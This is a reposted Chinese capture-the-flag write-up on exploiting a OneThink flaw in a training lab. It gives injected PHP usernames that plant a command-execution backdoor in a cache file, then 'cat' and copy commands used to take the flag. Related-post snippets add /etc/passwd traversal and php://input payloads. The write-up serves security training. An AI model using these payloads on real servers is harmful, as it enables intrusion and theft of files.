“百度杯”CTF比赛 2017 二月场_onthink

最新推荐文章于 2022-04-04 16:16:09 发布

转载最新推荐文章于 2022-04-04 16:16:09 发布 · 172 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/Ragd0ll/p/8734841.html

文章标签：

#php #runtime

本文介绍了一个onethink框架的已知漏洞利用过程。通过构造特殊用户名绕过限制，并结合burp工具修改请求包，成功获取服务器上的flag文件。在遭遇权限障碍时，采用复制而非读取的方式解决了问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

题目在i春秋ctf训练营中能找到，这题直接拿大佬的wp来充数

百度找到onethinnk的一个漏洞。

参考：http://www.hackdig.com/06/hack-36510.htm

就是注册个账号为：

%250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号，但因为账号长度有限制。所以分别两个来注册

账号一：%0a$a=$_GET[a];//

账号二：%0aecho `$a`;//

用burp来改包，不然会失败。

依次登入，也要用burp来改包登入。

然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php

查找下flag位置 cat就行了。

/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php

前面几步照着wp来完全没毛病，直到最后一步的时候卡住了

于是开始自己尝试

首先确定了该文件夹其他文件

试着去打开其他文件，发现别的文件都可以cat，只有flag.php不行，猜测这个文件设置了权限

不让我读还能不让我复制啊咋地，执行一下复制命令试试

回到刚才的目录下面一瞅

成功的复制过来了，直接访问flag.txt就能看到flag啦

转载于:https://www.cnblogs.com/Ragd0ll/p/8734841.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33736048

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

“百度杯”CTF比赛2017年2月场WP--web

Oavinci的博客

06-02

1068

一、爆破-1 在php语言中，所有的已经定义的变量都会保存在GLOBALS全局数组中，比方说你定义了一个$name="李华"，那么$GLOBALS['name']就等于“李华”。就是说，你可以通过这个全局数组来访问任何一个变量，所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。审计代码可以知道，我们可以用GET传值方式?hello=...

“百度杯”CTF比赛 2017 二月场--web 爆破-3

hanjinrui15的博客

12-28

368

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言一、pandas是什么？二、使用步骤1.引入库2.读入数据总结前言提示：这里可以添加本文要记录的大概内容：例如：随着人工智能的不断发展，机器学习这门技术也越来越重要，很多人都开启了学习机器学习，本文就介绍了机器学习的基础内容。提示：以下是本篇文章正文内容，下面案例可供参考一、pandas是什么？示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二、使用步骤 1.引入库代码

参与评论您还未登录，请先登录后发表或查看评论

“百度杯”CTF比赛 2017 二月场(Misc Web)

andiao1218的博客

04-21

621

爆破-1：打开链接，是502 我直接在后面加个变量传参数：?a=1 出了一段代码 var_dump()函数中，用了$$a，可能用了超全局变量GLOBALS 给hello参数传个GLOBALS 得到flag 爆破-2：打开链接 var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 ...

---“百度杯”CTF比赛 2017 二月场---------------include

qq_43182466的博客

04-26

337

ctrl+f查找allow_url_include ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190426220537866.png 可以构造?path=php://input 发现有个奇怪的文件名，访问它<?php echo 'cat dle345aae.php'?>出不来，但是看writeup上上条语句可以得到flag ...

“百度杯” CTF比赛 2017 二月场 --- 爆破2(10分)

qq_34106499的博客

01-14

469

1. file_get_contents()函数的使用； 2. file()函数的使用； 3. show_source()函数的使用； 4. php中执行linux系统命令的多种方法； 5. eval()函数的使用。

“百度杯”CTF比赛 2017 二月场--Zone

Oavinci的博客

05-17

741

提示未登录 BP抓包修改login=1，成功登录点击manage抓包，修改login=1，返回包中发现有个302页面跳转尝试访问系统配置文件 GET /manages/admin.php?module=/etc/passwd&name= 无回显 GET /manages/admin.php?module=../../../etc/passwd&name= 无回显怀疑过滤了../ 尝试用..././ GET /manages/admin.php?modul...

“百度杯” CTF比赛 2017 二月场 — 爆破-1（10分）

qq_34106499的博客

01-14

672

1. 文件包含的利用：include()函数； 2. $_REQUEST函数的使用； 3. 正则匹配的使用:pre_match()函数； 4. eval()函数的利用； 5. 全局变量$GLOBALS的利用；

百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目

03-30

百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目。

“百度杯”CTF比赛 2017 二月场 wp

qq_61768489的博客

04-04

1607

目录爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.

“百度杯”CTF比赛 2017 二月场--web 爆破-3 writeup

会下雪的晴天

06-14

601

题目简介解题思路进入链接后得到 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = '...

“百度杯”CTF比赛 2017 二月场爆破-2 writeup

xuchen16的博客

09-04

562

分值：10分类型：Misc Web已解答题目： flag不在变量中。 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 题目知识点： file_get_contents(path)函数，获得指定路径下的文件内容，以字符串的形式返回...

“百度杯”CTF比赛 2017 二月场爆破-3

weixin_30267697的博客

03-26

188

进入题目，题目源码： <?phperror_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){$_SESSION['nums']=0;$_SESSION['time']=time();$_SESSION['whoami']='ea';}if($_SESS...

“百度杯”CTF比赛 2017 二月场——Web-爆破-3

Ifish的博客

05-07

1087

题目描述解题思路创建赛题，打开链接提示说这个是爆破，看完代码以后，发现其实手动爆破也行利用md5函数不能对数组进行处理，所以传数组，然后构造?value[0]=e&amp;amp;value[1]=a，根据每一次的页面，修改value[0]value[1]的值即可，只要操作大于等于10次，就可以出flag flag{c0a65f45-3206-4618-8bc0-ba...

i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup

Senimo

03-28

1427

i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup爆破-1爆破-2爆破-3includeZoneOneThink 爆破-1 分值：10分类型：MiscWeb 题目内容：flag就在某六位变量中。启动靶机，打开题目：进入页面为一段源码，分析代码：包含flag.php文件需要传入变量hello的值正则表达式匹配：一个或多个[A-Za-z0-9_] var_dump(...

“百度杯”CTF比赛 2017 二月场---------------include

大方子

09-04

1418

================================ 个人收获： 1.网页的输出不一定会出现在页面上，也可能在页面源码里面 2.当php开启allow_url_include的时候，可以用php://input伪协议包含文件 3. php://filter/read=convert.base64-encode/resource=［文件路径］函数读取文件内容 4.php...

“百度杯”CTF比赛 2017 二月场 MiscWeb 爆破-1

qq_41475791的博客

11-26

305

打开题目的连接出现这串代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 从代码***include “flag.php”;**...

“百度杯”CTF比赛 2017 二月场--web 爆破-2

hanjinrui15的博客

12-27

220

百度杯”CTF比赛 2017 二月场--web 爆破-2基础知识PHP $_REQUESTPHP file()函数PHP show_source()函数PHP var_dump()函数PHP中@符号解题题目分析题目总结基础知识 web题目主要考察的还是PHP的代码理解与运用，我们根据这道题目先学习一下需要了解的基础知识。 PHP $_REQUEST 以下是我从百度中找到的比较易于理解的解释： PHP $_REQUEST是用于收集HTML表单提交的数据，PHP $_REQUEST属于PHP的超级全局变量。

2017 百度杯丶二月场第一周WP

weixin_30312659的博客

12-13

172

1.祸起北荒题目：亿万年前天子之子华夜，被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场“百度杯”的诸神之战他作为天族的太子必须参与到此次诸神之战定六荒十海华夜临危受命，马上带着火凤凰飞行到北荒“西二旗” 却没想到这六荒之首北荒西二旗果然名不虚传，这是一个位于六层虚数空间上的时空大陆他需要闯过每一层虚数空间，方能到达虚数空间第一层虚数空间是需要与一个上古神器“i春秋”进行智能比...

工匠杯-CTF比赛全解析：题目、解答与思路

在提供的资源中，包含了“工匠杯比赛”的三道题目、解答（WriteUp）和相关脚本。解答部分详细描述了解题思路，包括如何分析和解决问题的每一个步骤。脚本则可能包含了用于自动化攻击、信息获取、漏洞利用等操作的...